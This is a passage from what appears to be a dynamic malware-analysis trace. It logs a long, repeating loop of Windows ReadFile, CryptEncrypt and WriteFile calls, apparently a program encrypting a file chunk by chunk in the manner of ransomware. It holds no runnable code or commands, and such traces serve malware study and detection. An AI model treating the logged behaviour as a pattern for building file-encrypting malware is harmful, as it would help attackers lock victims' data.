pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.918] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.918] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.918] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.918] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.918] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.918] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.918] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.918] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.918] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.919] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.919] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.919] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.919] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.919] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.919] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.919] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.919] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.920] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.920] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.920] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.920] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.920] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.921] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.921] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.921] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.921] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.921] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.921] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.922] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.923] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.923] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.924] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.924] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.924] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.924] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.924] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.925] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.925] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, 